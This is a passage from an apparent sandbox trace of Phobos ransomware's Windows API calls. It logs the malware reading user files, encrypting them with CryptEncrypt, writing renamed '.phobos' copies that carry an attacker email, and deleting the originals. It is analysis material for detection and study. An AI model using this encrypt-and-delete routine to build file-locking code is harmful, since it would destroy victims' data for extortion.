dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.586] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10191) returned 1 [0190.587] CloseHandle (hObject=0xb8) returned 1 [0190.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml")) returned 0x2020 [0190.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.587] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.587] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.600] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.600] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.600] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x27cf, lpOverlapped=0x0) returned 1 [0190.617] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x27d0, dwBufLen=0x27d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x27d0) returned 1 [0190.617] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x27d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x27d0, lpOverlapped=0x0) returned 1 [0190.618] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.619] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.619] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.619] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.619] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.619] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.619] CloseHandle (hObject=0xb8) returned 1 [0190.619] CloseHandle (hObject=0xac) returned 1 [0190.619] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml")) returned 1 [0190.620] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.622] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=84) returned 1 [0190.622] CloseHandle (hObject=0xac) returned 1 [0190.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini")) returned 0x2020 [0190.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.622] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.622] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.623] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.623] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.623] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x54, lpOverlapped=0x0) returned 1 [0190.624] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0190.625] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0190.625] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.626] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.626] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.626] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.627] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.627] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.627] CloseHandle (hObject=0xac) returned 1 [0190.627] CloseHandle (hObject=0xb8) returned 1 [0190.627] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini")) returned 1 [0190.628] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.630] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16560) returned 1 [0190.630] CloseHandle (hObject=0xb8) returned 1 [0190.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png")) returned 0x2020 [0190.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.631] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.631] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.632] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.632] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x40b0, lpOverlapped=0x0) returned 1 [0190.779] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40c0, dwBufLen=0x40c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40c0) returned 1 [0190.779] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40c0, lpOverlapped=0x0) returned 1 [0190.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.781] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.781] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0190.781] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.781] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0190.781] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.781] CloseHandle (hObject=0xb8) returned 1 [0190.781] CloseHandle (hObject=0xac) returned 1 [0190.781] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png")) returned 1 [0190.782] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.784] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1124) returned 1 [0190.784] CloseHandle (hObject=0xac) returned 1 [0190.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml")) returned 0x2020 [0190.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.784] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.784] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.785] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.785] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x464, lpOverlapped=0x0) returned 1 [0190.841] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470, dwBufLen=0x470 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470) returned 1 [0190.841] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x470, lpOverlapped=0x0) returned 1 [0190.842] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.842] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.842] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0190.842] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.842] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0190.843] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.843] CloseHandle (hObject=0xac) returned 1 [0190.843] CloseHandle (hObject=0xb8) returned 1 [0190.843] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml")) returned 1 [0190.844] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.845] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=57) returned 1 [0190.845] CloseHandle (hObject=0xb8) returned 1 [0190.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml")) returned 0x2020 [0190.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.845] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.845] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.846] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.846] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.846] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x39, lpOverlapped=0x0) returned 1 [0190.847] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.847] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40, lpOverlapped=0x0) returned 1 [0190.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.848] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.848] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.848] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.848] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.848] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.848] CloseHandle (hObject=0xb8) returned 1 [0190.848] CloseHandle (hObject=0xac) returned 1 [0190.848] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml")) returned 1 [0190.849] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 